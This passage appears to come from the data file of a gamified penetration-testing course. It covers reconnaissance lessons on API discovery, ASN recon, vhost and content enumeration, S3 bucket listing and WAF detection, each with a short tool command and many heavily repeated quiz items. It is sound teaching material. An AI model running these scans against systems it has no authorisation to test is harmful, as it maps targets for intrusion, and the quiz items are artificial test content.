format","Obfuscation"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"api-disc","cat":"Reconnaissance","title":"API Discovery","diff":2,"xp":125,"intro":"Find and map APIs.","sections":[{"type":"text","content":"APIs are often less protected than web UIs."},{"type":"code","lang":"bash","content":"curl https://example.com/swagger.json"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"API spec file?","opts":["robots.txt","swagger.json",".htaccess","web.config"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"asn-recon","cat":"Reconnaissance","title":"ASN & BGP Recon","diff":3,"xp":200,"intro":"Map IP space via ASN.","sections":[{"type":"text","content":"ASN reveals entire IP footprint."},{"type":"code","lang":"bash","content":"amass intel -org 'Target Corp'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"ASN stands for?","opts":["Autonomous System Number","Active Service Node","App Security Net","Auto Scan Number"],"ans":0},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"js-analysis","cat":"Reconnaissance","title":"JavaScript Analysis","diff":2,"xp":150,"intro":"Extract endpoints from JS.","sections":[{"type":"text","content":"JS files contain API endpoints, tokens, hidden routes."},{"type":"code","lang":"bash","content":"python3 linkfinder.py -i https://example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Common JS secrets?","opts":["SSH keys","API keys and tokens","DB passwords","WiFi"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"vhost-enum","cat":"Reconnaissance","title":"Virtual Host Enum","diff":2,"xp":125,"intro":"Discover hidden vhosts.","sections":[{"type":"text","content":"One IP, multiple sites via Host header."},{"type":"code","lang":"bash","content":"ffuf -u http://10.10.10.1 -H 'Host: FUZZ.example.com' -w subs.txt -fs 612"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Header for vhosts?","opts":["Referer","Host","Origin","Accept"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"content-disc","cat":"Reconnaissance","title":"Content Discovery","diff":1,"xp":100,"intro":"Find hidden files and dirs.","sections":[{"type":"text","content":"Hidden directories, backup files, config files."},{"type":"code","lang":"bash","content":"gobuster dir -u http://10.10.10.1 -w common.txt -x php,bak"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Source code leak file?","opts":["robots.txt",".git/HEAD","favicon.ico","sitemap.xml"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"s3-enum","cat":"Reconnaissance","title":"S3 Bucket Enum","diff":2,"xp":125,"intro":"Find misconfigured S3 buckets.","sections":[{"type":"text","content":"Misconfigured S3 buckets leak data."},{"type":"code","lang":"bash","content":"aws s3 ls s3://company-data --no-sign-request"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"No-auth S3 flag?","opts":["--public","--no-sign-request","--anonymous","--open"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"waf-detect","cat":"Reconnaissance","title":"WAF Detection","diff":2,"xp":125,"intro":"Identify WAFs.","sections":[{"type":"text","content":"Knowing the WAF helps craft bypasses."},{"type":"code","lang":"bash","content":"wafw00f https://example.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"WAF detection tool?","opts":["nikto","wafw00f","whatweb","wappalyzer"],"ans":1},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"screenshot-rc","cat":"Reconnaissance","title":"Visual Recon","diff":1,"xp":75,"intro":"Bulk screenshot web services.","sections":[{"type":"text","content":"Screenshot hundreds of servers for quick triage."},{"type":"code","lang":"bash","content":"cat urls.txt | aquatone"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Benefit of bulk screenshots?","opts":["SQLi","Quick visual triage","Cracking","Privesc"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"param-disc","cat":"Reconnaissance","title":"Parameter Discovery","diff":2,"xp":125,"intro":"Find hidden parameters.","sections":[{"type":"text","content":"Hidden params enable debug modes or bypass auth."},{"type":"code","lang":"bash","content":"arjun -u https://example.com/page"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, 